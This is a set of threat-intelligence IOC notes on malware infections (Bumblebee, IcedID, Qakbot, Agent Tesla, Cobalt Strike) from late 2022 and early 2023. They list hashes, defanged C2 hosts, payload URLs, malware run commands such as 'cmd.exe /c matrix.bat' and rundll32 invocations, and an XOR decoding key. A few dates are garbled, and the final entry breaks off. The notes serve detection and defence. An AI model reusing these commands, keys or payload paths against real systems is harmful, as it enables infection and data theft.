/2022-12-07-IOCs-for-Bumblebee-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-12-07 (WENDESDAY) - BUMBLEBEE INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - The .img disk image file used for this Bumblebee infection was submitted to VirusTotal on Tuesday 2022-12-06. 6 | - Cannot determine the delivery method for this .img file. 7 | - No Cobalt Strike binary was saved to disk. 8 | - Certificate data for Cobalt Strike HTTPS traffic suggests the server was established on 2022-11-15. 9 | 10 | DISK IMAGE: 11 | 12 | - SHA256 hash: 1367bcb44c70baf0ff20e488c38a6efde51eb61d14abb0292d848800a88f7961 13 | - File size: 2,097,152 bytes 14 | - File name: unknown, possibly PFFMDdY6E.img 15 | - File description: Disk image with contents used for Bumblebee infection 16 | - Note: File mounts as disk image in Win 10/11, but it's not identified as a disk image in VirusTotal or using the *nix file command. 17 | 18 | CONTENTS OF THE ABOVE DISK IMAGE: 19 | 20 | - SHA256 hash: ac8e67644d7b6b6f0bd78522a3568c98fe386a23542f73a2ec1a3cff4f433684 21 | - File size: 1,745 bytes 22 | - File name: order.lnk 23 | - File description: Windows shortcut, only visible file in the disk imagechm 24 | - Shortcut: C:\Windows\System32\cmd.exe /c matrix.bat 25 | 26 | - SHA256 hash: d084bcd4d01dc5964e31910bc90ca4574d6270e1e57f01af7c633ee02e0a6d06 27 | - File size: 3,091 bytes 28 | - File name: matrix.bat 29 | - File description: Batch file that copies Bumblebee DLL to disk, runs it, and sets scheduled task to keep it persistent. 30 | 31 | - SHA256 hash: 1436cd7b3ec8fc3941292fad31475711a89b050bd1d87cdbbbf2866394dad099 32 | - File size: 851,968 bytes 33 | - File name: worldsex.dll 34 | - Saved to disk at: C:\ProgramData\worldsex.dll 35 | - File description: 64-bit DLL for Bumblebee malware 36 | - Run method: rndll32.exe [filename],mainRngSet 37 | 38 | MALWARE NOTES: 39 | 40 | - C:\Windows\System32\rundll32.exe was copied to C:\ProgramData\oiv0I4ymqE.exe and set by scheduled task to run Bumblebee DLL. 41 | 42 | INFECTION TRAFFIC: 43 | 44 | - 88.52.50[.]98 port 452 - attempted TCP connections for Bumblebee C2 45 | - 81.77.212[.]213 port 118 - attempted TCP connections for Bumblebee C2 46 | - 139.177.146[.]137 port 443 - HTTPS traffic for Bumblebee C2 47 | - 23.108.57[.]213 port 443 - ceyuvigi[.]com - HTTPS traffic for Cobalt Strike 48 | 49 | CERTIFICATE ISSUER DATA FOR COBALT STRIKE SERVER AT 23.108.57[.]213: 50 | 51 | Subject Name: 52 | - Common Name: ceyuvigi[.]com 53 | 54 | Issuer Name: 55 | - Country: GB 56 | - State/Province: Greater Manchester 57 | - Locality: Salford 58 | - Organization: Sectigo Limited 59 | - Common Name: Sectigo RSA Domain Validation Secure Server CA 60 | 61 | Validity: 62 | - Not Before: Tue, 15 Nov 2022 00:00:00 GMT 63 | - Not After: Wed, 15 Nov 2023 23:59:59 GMT 64 | 65 | Subject Alt Names: 66 | - DNS Name: ceyuvigi[.]com 67 | - DNS Name: www.ceyuvigi[.]com 68 | -------------------------------------------------------------------------------- /2022-12-09-IOCs-for-HTML-smuggling-to-ISO-files-for-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-12-09 (FRIDAY): HTML SMUGGLING PUSHES COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - unknown, possibly email --> HTML file (possibly attachment) --> downloaded ISO image --> Windows shortcut --> runs Powershell script 6 | 7 | NOTES: 8 | 9 | - This activity is a continuation of activity reported as early as 2022-12-05 at: https://twitter.com/James_inthe_box/status/1599787857467834368 10 | - In this most recent wave, at least 8 HTML files have been submitted to VirusTotal since 2022-12-09, all have names starting with DMCA-Report- and ending with an .html file extension. 11 | - No proof of delivery vector, but these were likely sent as email attachments. 12 | 13 | EXAMPLE OF ATTACHED HTML FILE AND SMUGGLED ISO IMAGE: 14 | 15 | - SHA256 hash: 81fa36b1d5e9f5457644fc784f2e03d14734052c35023e899ba521697d0bbef9 16 | - File size: 1,780,737 bytes 17 | - File name: DMCA-Report-67718961029992.html 18 | - File description: Email attachment, HTML file used for smuggling below ISO image 19 | 20 | - SHA256 hash: c897cd5eb6d4c569f9a540bafb0f966f14e960826266648c08a15f5a48ba58db 21 | - File size: 874,496 bytes 22 | - File name: DMCA-Report-87f1e5e70079d.iso 23 | - File description: ISO image presented by the above HTML file 24 | 25 | CONTENTS OF ISO IMAGE: 26 | 27 | - SHA256 hash: 7ffbeb1df7b0dcb06ddc0e54b7e06b338bf4901461022b0af7fe4b97d12ab4ef 28 | - File size: 2,179 bytes 29 | - File name:DMCA-Report.lnk 30 | - File description: Windows shorcut, only visible file in ISO image 31 | 32 | - SHA256 hash: 5799028ec3ad388e031fc42cd0fb5443a5a5e0a7e3e57c895a3f9e4ce4c2e9ee 33 | - File size: 34,098 bytes 34 | - File name: xqdxcxlgtxeesj.log 35 | - File description: Powershell script run by above Windows shortcut 36 | 37 | - SHA256 hash: 7cdf0263c3ce42e3ff3ea3c0a376e1aa1b0340dfc1e373f3c765a51a3a639be8 38 | - File size: 453,626 bytes 39 | - File name: wnjvejahaimreqt.log 40 | - File description: Powershell script run by above Powershell script 41 | 42 | - SHA256 hash: 3902e1734b1d0187d3404dafa4616212342630cb46913242060f485e58201a75 43 | - File size: 11,140 bytes 44 | - File name: zvdcoglidj.pdf 45 | - File description: Decoy PDF file opened during infection process that states, "Couldn't open PDF" 46 | 47 | COBALT STRIKE TRAFFIC: 48 | 49 | - 165.22.48[.]183 port 80 - 165.22.48[.]183 - GET /common?chunk=false HTTP/1.1 50 | - 165.22.48[.]183 port 80 - 165.22.48[.]183 - POST /tab_shop HTTP/1.1 (application/x-www-form-urlencoded 51 | -------------------------------------------------------------------------------- /2022-12-20-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-12-20 (TUESDAY): ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - The initial zip archive is likely from a fake software page referred to from a Google ad. 6 | - For more information, see: https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344/ 7 | 8 | DOWNLOADED ZIP AND EXTRACTED ISO IMAGE: 9 | 10 | - SHA256 hash: 533fcedd97d1ef374629c61f7482bb5711b366ac025f648b92f924111f676c5a 11 | - File size: 585,550 bytes 12 | - File name: Setup_Win_20-12-2022_13-48-52.zip 13 | - File description: Zip archive likely downloaded from fake software page 14 | 15 | - SHA256 hash: 866a63ec6d217e594a69b34bfe3a629c4eac3b6f117fe191df1a2bac3b4f5491 16 | - File size: 2,818,048 bytes 17 | - File name: Setup_Win_20-12-2022_13-48-52.iso 18 | - File description: ISO image extracted from the above zip archive 19 | 20 | CONTENTS OF ISO IMAGE: 21 | 22 | - SHA256 hash: 6a973a28800a689db38973fa0465a80915200e5d1e8a5ca0a7876cfb7428270c 23 | - File size: 2,990 bytes 24 | - File name: LicenseSoft_12-19.lnk 25 | - File description: Windows shortcut used to run the installer DLL for IcedID below 26 | - Shortcut: rundll32.exe \liemap.dat,init 27 | 28 | - SHA256 hash: 90551d31eb982f6e35514e0d028465f9699b21fccdc3e7a1ca53f839b5055a98 29 | - File size: 1,363,734 bytes 30 | - File name: liemap.dat 31 | - File description: 64-bit DLL installer for IcedID 32 | - Run method: rundll32.exe [filename],init 33 | 34 | MALWARE/ARTIFACTS FROM AN INFECTION: 35 | 36 | - SHA256 hash: 8ec930ccc29c7a7ee877ab046203f7770b21e5740f2ca826abdfc3a6ca6a04b6 37 | - File size: 1,713,300 bytes 38 | - File location: hxxp://trbiriumpa[.]com/ 39 | - File description: gzip binary on trbiriumpa[.]com retrieved by above IcedID installer 40 | 41 | - SHA256 hash: 509628d0ce1f30b6ce77aa484fb687aa23fa9d7ee73ed929e149eee354b3a3b0 42 | - File size: 352,906 bytes 43 | - File location: C:\Users\[useranem]\AppData\Roaming\SpendMesh\license.dat 44 | - File description: data binary used to run persistent IcedID DLL below 45 | 46 | - SHA256 hash: 38cb14c7cd94b1662dd8432042b286bf597f8b29b22eb5f682977bd9f2a37d68 47 | - File size: 1,359,638 bytes 48 | - File location: C:\Users\[username]\AppData\Roaming\[username]\[username]\jejiia4.dll 49 | - File description: 64-bit DLL for persistent IcedID infection 50 | - Run method: rundll32.exe [filename],init --arpa="[path to license.dat]" 51 | 52 | - SHA256 hash: 56f354afbff05d3d6f4a8a8f85ba5457a65cda09cc7443fa75fca1169676bf26 53 | - File size: 229,376 bytes 54 | - File location: hxxp://209.182.227[.]138/download/x64.dll 55 | - File location: C:\Users\[useranem]\AppData\Local\Temp\Uyusdu.dll 56 | - File description: 64-bit DLL for Cobalt Strike 57 | - Run method: regsvr32.exe [filename] 58 | 59 | INITIAL ICEDID C2, DOMAIN FOR GZIP BINARY: 60 | 61 | - 143.198.92[.]88 port 80 - trbiriumpa[.]com - GET / HTTP/1.1 62 | 63 | ICEDID C2 TRAFFIC: 64 | 65 | - 103.208.85[.]184 port 443 - thinkiwond[.]skin - HTTPS traffic 66 | - 103.208.85[.]184 port 443 - artiwal[.]pics - HTTPS traffic 67 | 68 | TRAFFIC FOR COBALT STRIKE: 69 | 70 | - 209.182.227[.]138 port 80 - 209.182.227[.]138 - GET /download/x64.dll HTTP/1.1 71 | - 23.81.246[.]152 port 443 - xedefeg[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2022-12-29-IOCs-for-malware-from-fake-Adobe-Reader-page.txt: -------------------------------------------------------------------------------- 1 | 2022-12-29 (THURSDAY): GOOGLE AD LEADS TO FAKE ADOBE READER PAGE PUSHING MALWARE 2 | 3 | GOOGLE AD URL: 4 | 5 | - URL: hxxps://www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwjy4sagmJ_8AhVJFdQBHY3OAxEYABADGgJvYQ&ae=2&ohost=www.google[.]com&cid=CAASJuRokbSmQNuTK23Kw7UbgirwiJVLfiVKasNW9fqwpyfMANvnxVw2&sig=AOD64_2C1NIk9OeXrYlcz91FT042ICksIQ&q&adurl&ved=2ahUKEwi_xrqgmJ_8AhXOlmoFHaFDApUQ0Qx6BAgHEAE&nis=8&dct=1 6 | - Response: HTTP/1.1 302 Found 7 | - Location: hxxps://bdppay[.]com?gclid=EAIaIQobChMI8uLGoJif_AIVSRXUAR2NzgMREAAYASAAEgLOo_D_BwE 8 | 9 | TRAFFIC REDIRECTION URL: 10 | 11 | - 91.217.9[.]70 port 443 12 | - URL: hxxps://bdppay[.]com/?gclid=EAIaIQobChMI8uLGoJif_AIVSRXUAR2NzgMREAAYASAAEgLOo_D_BwE 13 | - Response: HTTP/1.1 302 Found 14 | - Location: Location: hxxps://adobereaders[.]co 15 | 16 | FAKE ADOBE READER SITE: 17 | 18 | - 198.54.114[.]160 port 443 - hxxps://adobereaders[.]co/ 19 | 20 | MALWARE DOWNLOAD URL FROM FAKE ADOBE READER SITE: 21 | 22 | - 198.54.114[.]160 port 443 - hxxps://bravebrowsers[.]cc/setup_4.21.exe 23 | 24 | DOWNLOADED MALWARE: 25 | 26 | - SHA256 hash: 37082f0b757d6c249b870c29872a9bf8e38e344150735d9b6d2a64364b18b226 27 | - File size: 288,256 bytes 28 | - File name: setup_4.21.exe 29 | - File description: Windows executable file for infostealer and possible backdoor malware 30 | 31 | POST-INFECTION TRAFFIC: 32 | 33 | - DNS query for system-checki[.]com - response: No such name 34 | - port 443 - keyauth[.]win - HTTPS trafic, Legitimate site 35 | - 78.47.195[.]75 port 4449 - TLS v1.0 traffic 36 | - 78.47.195[.]75 port 4448 - TCP traffic with host data and screenshot of victim's desktop 37 | 38 | CERTIFICATE ISSUER DATA FROM SERVER AT 78.47.195[.]75: 39 | 40 | - id-at-commonName=PEGASUS SERVER 41 | - id-at-organizationalUnitNmae=PEGASUS 42 | - id-at-organizationName=PEGASUS By SKYNET 43 | - id-at-localityName=SH 44 | - id-at-countryName=CN 45 | 46 | CERTIFICATE SUBJECT DATA FROM SERVER AT 78.47.195[.]75: 47 | 48 | - id-at-commonName=PEGASUS -------------------------------------------------------------------------------- /2023-01-05-IOCs-from-Agent-Tesla-variant-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-01-05 (THURSDAY) - MALSPAM CAUSES INFECTION FOR AGENT TESLA VARIANT, POSSIBLY ORIGINLOGGER 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> attached .iso file --> contains .exe file --> .exe loads encoded binary --> binary decoded & used to generate Agent Telsa-style traffic 6 | 7 | NOTES: 8 | 9 | - This malware triggers alerts for Agent Tesla, but it is likely OriginLogger as discussed here: https://unit42.paloaltonetworks.com/originlogger/ 10 | 11 | - The malware EXE used for this infection rettrieves XOR-encoded binary from a web server. 12 | - The XOR-encoded binary is decoded into a malicious DLL that is used to generate Agent Tesla-style traffic. 13 | - The decoded DLL is not saved to disk. 14 | - The infected host will start thise entire process again after the host is rebooted, or the victim logs off & logs back in. 15 | 16 | EMAIL INFORMATION FROM MALSPAM: 17 | 18 | - Received: from multisped.com.mk (multisped.com.mk [185.250.254.32]); Thu, 5 Jan 2023 04:18:36 +0000 (UTC) 19 | - From: JPMorgan Chase Bank N.A 20 | - Subject: BANK PAYMENT NOTIFICATION 21 | - Attachment name: Payment Copy_Chase Bank_Pdf.iso 22 | 23 | ASSOCIATED FILES: 24 | 25 | - SHA256 hash: 926a3142270a52f8afb93490d5dd21f0ca23bc0815ee6630068cf6409d8ee448 26 | - File size: 1,245,184 bytes 27 | - File name: Payment Copy_Chase Bank_Pdf.iso 28 | - File type: UDF filesystem data (version 1.5) 'PAYMENT_COPY_CHASE_BANK_PDF' 29 | - File description: This file mounts as a disk image on Windows and Mac hosts 30 | 31 | - SHA256 hash: 5016ba92afac1c2b2a2a6b17a09406869bd6f58cfe680f25030af1a1ba1c29a2 32 | - File size: 26,112 bytes 33 | - File name: Payment Copy_Chase Bank_Pdf.exe 34 | - File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows 35 | - File description: Windows EXE retreived from the above .iso file 36 | 37 | - SHA256 hash: 90d977ca0a3331d78005912d2b191d26e33fa2c6ef17602d6173164ba83fd85e 38 | - File size: 664,576 bytes 39 | - File location: hxxp://savory.com[.]bd/sav/Ztvfo.png 40 | - File type: data 41 | - File description: Malicious binary XOR-ed with the ASCII string: Sfhdjkpkowgnpcgoshb 42 | 43 | - SHA256 hash: 3883d374ba0736254a89e310b86f3c3769adcaed471b103b5c0a8a2f16cf5c8d 44 | - File size: 664,576 bytes 45 | - File type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows 46 | - File description: Malicious DLL file decoded from the above binary 47 | 48 | INFECTION TRAFFIC: 49 | 50 | - 45.56.99[.]101 port 80 - savory.com[.]bd - GET /sav/Ztvfo.png 51 | - port 443 - api.ipify.org - HTTPS traffic, IP address by the infected Windows host, not inherently malicious 52 | - 204.11.58[.]28 port 587 - mail.transgear[.]in - unencrypted SMTP traffic generated by Agent Tesla variant -------------------------------------------------------------------------------- /2023-01-12-IOCs-from-IcedID-and-Cobalt-Strike-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-01-23 (THURSDAY) - ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> attached PDF --> password-protected zip --> extracted ISO --> files to run IcedID installer --> IcedID C2 --> Cobalt Strike 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: 1d769af38bea969c00501ff64b51f4e4fd2de2bedc7785b3471b7d12765c1a7d 10 | - file size: 139,342 bytes 11 | - File name: Document_251_Unpaid_-1-12.pdf 12 | - File description: Example of PDF used to download passwor-protected zip for IcedID infection. 13 | 14 | - SHA256 hash: fbeffaaf34d13cd45e2e545172db2287fead4ed05c04c0e8da549a0869d2fa96 15 | - file size: 110,732 bytes 16 | - File name: Document_224_Copy_01-12.zip 17 | - File description: password-protected zip archive downloaded from firebasestorage.googleapis[.]com URL in above PDF 18 | - Password: z5247 19 | 20 | - SHA256 hash: 9661ba9658bf85409cc414b8f62aaca490ac9f75aa4c2a146795945cf014b211 21 | - file size: 1,376,256 bytes 22 | - File name: Document_224_Copy_01-12.iso 23 | - File description: Disk image containing files for IcedID 24 | 25 | CONTENTS OF THE ISO IMAGE: 26 | 27 | - SHA256 hash: 1e84f66e29d4c0263d3b67bc9a694eabdff306fc83635bb1d4bd5d4c894c8428 28 | - file size: 1,978 bytes 29 | - File name: Document.lnk 30 | - File description: Windows shortcut that runs hidden .cmd file below 31 | 32 | - SHA256 hash: 156ed6c025b8d1dcfa8b3f9a183fc89fbbedc9f2cb178806ad23c2663a1d345c 33 | - file size: 1,593 bytes 34 | - File name: negconrodl\bogpacsipr.cmd 35 | - File description: Command line script used to run the IcedID installer DLL 36 | 37 | - SHA256 hash: 65281fe83e22bde20fa56079bebaea6fb353d1036be8073924fdf64cd9194984 38 | - file size: 194,440 bytes 39 | - File name: negconrodl\outgoing.dat 40 | - File description: IcedID installer DLL (64-bit) 41 | - Run method: rundll32.exe [filename],init 42 | 43 | FILE FROM AN INFECTION: 44 | 45 | - SHA256 hash: 6b22df802f36a9ab0a1f963304fcfcba7cf4b7a922ac123ac2d53240f18c3ab5 46 | - file size: 544,003 bytes 47 | - File location: hxxp://allertmnemonkik[.]com/ 48 | - File description: gzip binary retrieved by above IcedID installer DLL 49 | 50 | - SHA256 hash: 509628d0ce1f30b6ce77aa484fb687aa23fa9d7ee73ed929e149eee354b3a3b0 51 | - file size: 352,906 bytes 52 | - File location: C:\Users\[username]\AppData\Roaming\HoleWheel\license.dat 53 | - File description: data binary used to run persistent IcedID DLL 54 | 55 | - SHA256 hash: e144b75d9cb85a5decf7895c824c025bc0f163af81094078130a2826328165eb 56 | - file size: 190,344 bytes 57 | - File location: C:\Users\[username]\AppData\Local\{7FB4161A-1942-0027-7D5F-A43B70B656A5}\Reexbw64.dll",Reexbw64.dll 58 | - File description: Persistent IcedID DLL 59 | - Run method: rundll32.exe [filename],init --qume="[path to license.dat]" 60 | 61 | - SHA256 hash: 4c9364c85bd1e8a2fb53181696d6471ae10971f4cc709419dfaf6224b23b9f55 62 | - file size: 540,672 bytes 63 | - File location: hxxp://199.127.60[.]47/download/sg.exe 64 | - File description: 64-bit Windows EXE for Cobalt Strike 65 | 66 | URL FOR ZIP ARCHIVE DOWNLOAD: 67 | 68 | - hxxps://firebasestorage.googleapis[.]com/v0/b/cobalt-nomad-372419.appspot.com/o/OwSq1IMH1D%2FDocument_224_Copy_01-12.zip?alt=media& 69 | token=aa49349f-ed98-456b-85c4-ce74daf4a0e3 70 | 71 | TRAFFIC GENERATED BY ICEDID INSTALLER DLL FOR GZIP BINARY: 72 | 73 | - 162.33.177[.]186 port 80 - allertmnemonkik[.]com - GET / 74 | 75 | ICEDID C2 TRAFFIC: 76 | 77 | - 103.208.85[.]127 port 443 - turelomi[.]hair - HTTPS traffic 78 | - 94.140.115[.]3 port 443 - lezhidov[.]cloud - HTTPS traffic 79 | - 5.230.74[.]203 port 443 - qzmeat[.]cyou - HTTPS traffic 80 | 81 | COBALT STRIKE TRAFFIC: 82 | 83 | - 199.127.60[.]47 port 80 - 199.127.60[.]47 - GET /download/sg.exe 84 | - 185.173.34[.]36 port 443 - fepopeguc[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2023-01-23-IOCs-for-Google-ad-for-possible-TA505-activity.txt: -------------------------------------------------------------------------------- 1 | 2022023-01-23 (MONDAY): GOOGLE AD --> FAKE ANYDESK PAGE --> POSSIBLE TA505 ACTIVITY 2 | 3 | NOTES: 4 | 5 | - Download-cdn[.]com seen in today's traffic is associated with infrastructure previously used for TA505's "Get2" (GetandGo) loader. 6 | - TA505's Get2 loader was last seen in 2020, back when threat actors more commonly used Microsoft Office documents as initial lures. 7 | 8 | INFECTION CHAIN: 9 | 10 | - Google ad --> fake AnyDesk page --> MSI --> traffic for persistent DLL --> traffic for additional DLL --> post-infection C2 11 | 12 | GOOGLE AD: 13 | 14 | - hxxps://www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwjXyOnToN78AhW3fG8EHXGmBggYABABGgJqZg&ohost=www.google.com& 15 | cid=CAASJuRoQHLL0UjPJuRfBwY5hCvWnzj89qG_kmWAzxtkdnaNbPIElHZF&sig=AOD64_3_5-fOmGsshEyXOapF53KCoq3rWA&q& 16 | adurl&ved=2ahUKEwiOwuHToN78AhVGlGoFHRkEAOMQ0Qx6BAgLEAE 17 | 18 | - 188.127.239[.]132 - hxxps://www.amydecke[.]online/?gclid=EAIaIQobChMI18jp06De_AIVt3xvBB1xpgYIEAAYASAAEgK_1PD_BwE 19 | 20 | FAKE ANYDESK PAGE: 21 | 22 | - 191.101.13[.]129 - hxxps://anydeskcloud[.]tech/?gclid=EAIaIQobChMI18jp06De_AIVt3xvBB1xpgYIEAAYASAAEgK_1PD_BwE 23 | 24 | MSI FILE DOWNLOAD 25 | 26 | - 191.101.13[.]129 - hxxps://anydeskcloud[.]tech/download/AnyDeskSetup_26b30163.msi 27 | 28 | DOWNLOADED MSI FILE: 29 | 30 | - SHA256 hash: e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c 31 | - File size: 11,544,064 bytes 32 | - File name: AnyDeskSetup_26b30163.msi 33 | - File description: MSI installer for TA505 malware 34 | - Sample: https://bazaar.abuse.ch/sample/e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c/ 35 | - Note: SAH256 hash for this sample was first reported in VT on 2022-12-01. 36 | 37 | INFECTION TRAFFIC: 38 | 39 | - 152.89.196[.]75 - hxxps://download-cdn[.]com/download.php?f=Ldrp.dll&from=AnyDeskSetup_26b30163.msi <-- DLL for persistent malware 40 | - 152.89.196[.]75 - hxxps://download-cdn[.]com/pload/26b30163 <-- Follow-up DLL retrieved by persistent malware 41 | 42 | EXAMPLE OF PERSISTENT MALWARE: 43 | 44 | - SHA256 hash: caaea7ec83956a823420a78dec430fddb5db65d9fa4bc6555659b9b0c05c817a 45 | - File size: 112,640 bytes 46 | - File location: hxxps://download-cdn[.]com/download.php?f=Ldrp.dll&from=AnyDeskSetup_26b30163.msi 47 | - File location: C:\ProgramData\1c220cdc.dat 48 | - File description: DLL used to keep TA505 malware persistent 49 | - Sample: https://bazaar.abuse.ch/sample/caaea7ec83956a823420a78dec430fddb5db65d9fa4bc6555659b9b0c05c817a/ 50 | - Run method: rundll32.exe [filename],#2 51 | - Note: File hash and file name is different each time the MSI file installer is run, although file size and 52 | placement under C:\ProgramData\ directory remain consistent. 53 | 54 | POST-INFECTION C2 TRAFFIC: 55 | 56 | - 64.190.113[.]123:443 - TCP traffic 57 | 58 | EXAMPLE OF MALWARE RESPONSIBLE FOR POST-INFECTION TRAFFIC: 59 | 60 | - SHA256 hash: e14ee6302076a2bb9e5634407500757319d5de9c45305ec6269120b7283b24cf 61 | - File size: 94,720 bytes 62 | - File location: hxxps://download-cdn[.]com/pload/26b30163 63 | - File description: DLL retreived by persistent malware but not saved to disk 64 | - Sample: https://bazaar.abuse.ch/sample/e14ee6302076a2bb9e5634407500757319d5de9c45305ec6269120b7283b24cf/ 65 | - Note: File hash is different each time this file is retrieved from download-cdn[.]com 66 | -------------------------------------------------------------------------------- /2023-01-31-BB12-Qakbot-infection-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2023-01-31 (TUESDAY) - QAKBOT INFECTION (DISTRIBUTION TAG: BB12) WITH COBALT STRIKE AND VNC ACTIVITY 2 | 3 | NOTES: 4 | 5 | - Qakbot stopped sending new spam near the end of December 2022. 6 | - On 2023-01-31, Qakbot returned from an absence of approximately 1 month and began spamming again. 7 | - Since its return, Qakbot has been using malicious OneNote (.one) files as the initial malware lure. 8 | - Post-infection activity from our Qakbot test run today includes Cobalt Strike and VNC traffic. 9 | 10 | BB12 INFECTION CHAIN: 11 | 12 | - email --> link --> downloaded zip --> extracted .one file --> embedded .hta file -- traffic for Qakbot DLL --> Qakbot C2 13 | 14 | OBAMA234 INFECTION CHAIN: 15 | 16 | - thread-hijacked email --> attached .one file --> embedded .hta file -- traffic for Qakbot DLL --> Qakbot C2 17 | 18 | MALWARE FROM AN INFECTED WINDOWS HOST: 19 | 20 | - SHA256 hash: cbd7136dcdc7746124d93dc05d461ee5def7fc1b498183f453d4cb0c3b4926b6 21 | - File size: 142,620 bytes 22 | - File name: 408709.one.zip 23 | - File location: hxxps://aixjobsonline[.]net/SFAF.php?PPSIITERISAC=1 24 | - File description: Zip archive downloaded from link in email distributing Qakbot 25 | 26 | - SHA256 hash: 002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c 27 | - File size: 185,696 bytes 28 | - File name: 408709.one 29 | - File description: OneNote file extracted from the above zip archive 30 | 31 | - SHA256 hash: 145e9558ad6396b5eed9b9630213a64cc809318025627a27b14f01cfcf644170 32 | - File size: 2,536 bytes 33 | - File name: attachment.hta 34 | - File description: .hta file attached to above OneNote file, used to download/run the Qakbot DLL 35 | 36 | - SHA256 hash: d6e499b57fdf28047d778c1c76a5eb41a03a67e45dd6d8e85e45bac785f64d42 37 | - File size: 743,422 bytes 38 | - File location: hxxps://rmbonlineshop[.]com/VV71d8/300123.gif 39 | - File location: C:\ProgramData\121.png 40 | - File description: DLL for Qakbot (32-bit) retrieved by the above .hta file 41 | - Run method: rundll32 [filename],Wind 42 | - Note: This is a different size and file hash each time the file is downloaded 43 | 44 | TRAFFIC FROM AN INFECTION: 45 | 46 | LINK FROM EMAIL SENDING ZIP ARCHIVE: 47 | 48 | - hxxp://aixjobsonline[.]net/SFAF.php?PPSIITERISAC=1 49 | - port 443 - aixjobsonline[.]net - HTTPS traffic 50 | 51 | MALICIOUS .HTA IN .ONE FILE RETRIEVES QAKBOT DLL: 52 | 53 | - port 443 - (HTTPS traffic) - hxxps://rmbonlineshop[.]com/VV71d8/300123.gif 54 | 55 | QAKBOT C2 TRAFFIC TO LEGITIMATE DOMAINS: 56 | 57 | - port 443 - broadcom.com - HTTPS traffic 58 | - port 443 - cisco.com - HTTPS traffic 59 | - port 443 - google.com - HTTPS traffic 60 | - port 443 - irs.gov - HTTPS traffic 61 | - port 443 - linkedin.com - HTTPS traffic 62 | - port 443 - microsoft.com - HTTPS traffic 63 | - port 443 - oracle.com - HTTPS traffic 64 | - port 443 - verisign.com - HTTPS traffic 65 | - port 443 - xfinity.com - HTTPS traffic 66 | - port 443 - yahoo.com - HTTPS traffic 67 | - port 443 - www.openssl.org - HTTPS traffic 68 | 69 | QAKBOT C2 TRAFFIC: 70 | 71 | - 87.10.205[.]117 port 443 - HTTPS traffic 72 | - 82.121.195[.]187 port 2222 - HTTPS traffic 73 | - 92.8.190[.]175 port 2222 - HTTPS traffic 74 | - 5.75.205[.]43 port 443 - HTTPS traffic 75 | - 23.111.114[.]52 port 65400 - TCP traffic 76 | 77 | COBALT STRIKE TRAFFIC: 78 | 79 | - 104.237.219[.]36 port 443 - ciruvowuto[.]com - HTTPS traffic 80 | - 104.237.219[.]36 port 443 - HTTPS traffic 81 | - 104.237.219[.]36 port 8888 - ciruvowuto[.]com - HTTPS traffic 82 | 83 | VNC TRAFFIC: 84 | 85 | - 78.31.67[.]7 port 443 86 | -------------------------------------------------------------------------------- /2023-02-08-IOCs-for-Cobalt-Strike-from-IcedID.txt: -------------------------------------------------------------------------------- 1 | 2023-02-08 (WEDNESDAY) - COBALT STRIKE FROM ICEDID (BOKBOT) INFECTION 2 | 3 | NOTES: 4 | 5 | - IcedID infection generated using a OneNote file reported earlier today by @k3dg3 at: 6 | -- https://twitter.com/k3dg3/status/1623333951069646857 7 | 8 | ICEDID TRAFFIC: 9 | 10 | - 80.66.88[.]143 port 80 - ehonlionetodo[.]com - GET / 11 | - 94.232.46[.]221 port 443 - noosaerty[.]com - HTTPS traffic 12 | - 37.252.6[.]77 port 443 - palasedelareforma[.]com - HTTPS traffic 13 | 14 | COBALT STRIKE TRAFFIC: 15 | 16 | - 167.172.154[.]189 port 80 - 167.172.154[.]189 - GET /36.ps1 17 | - 167.172.154[.]189 port 80 - 167.172.154[.]189 - GET /b360802.dll 18 | - 79.132.128[.]191 port 443 - thefirstupd[.]com - HTTPS traffic 19 | 20 | COBALT STRIKE STAGER: 21 | 22 | - SHA256 hash: 9e68ac920bae102ccf1829ae8b8c212cc3046dd82114966c74e740df68b76fcd 23 | - File size: 754,688 bytes 24 | - File location: hxxp://167.172.154[.]189/b360802.dll 25 | - File location: C:\Windows\tasks\si.dll 26 | - File description: 64-bit DLL stager for Cobalt Strike 27 | - Run method: rundll32.exe [filename],ApendMenu 28 | - Sample: https://bazaar.abuse.ch/sample/9e68ac920bae102ccf1829ae8b8c212cc3046dd82114966c74e740df68b76fcd/ -------------------------------------------------------------------------------- /2023-02-13-IOCs-for-IcedID-infection-from-fake-Microsoft-Teams-page.txt: -------------------------------------------------------------------------------- 1 | 2023-02-13 (MONDAY) - ICEDID (BOKBOT) INFECTION FROM FAKE MICROSOFT TEAMS PAGE 2 | 3 | NOTE: 4 | 5 | - The fake Microsoft Teams page was registered on Thursday, 2023-02-09. 6 | 7 | - Certificate data for HTTPS from fake Microsoft Teams page indicates this server was established on 2023-02-09. 8 | 9 | - This was likely set up for a malvertising campaign as reported earlier this month by Spamhaus at: 10 | -- https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/ 11 | 12 | FAKE TEAMS PAGE: 13 | 14 | - 85.193.93[.]125 - hxxps://microsofteamsus[.]top/en-us/teams/download-app/ 15 | 16 | ZIP ARCHIVE DOWNLOAD: 17 | 18 | - port 443 - 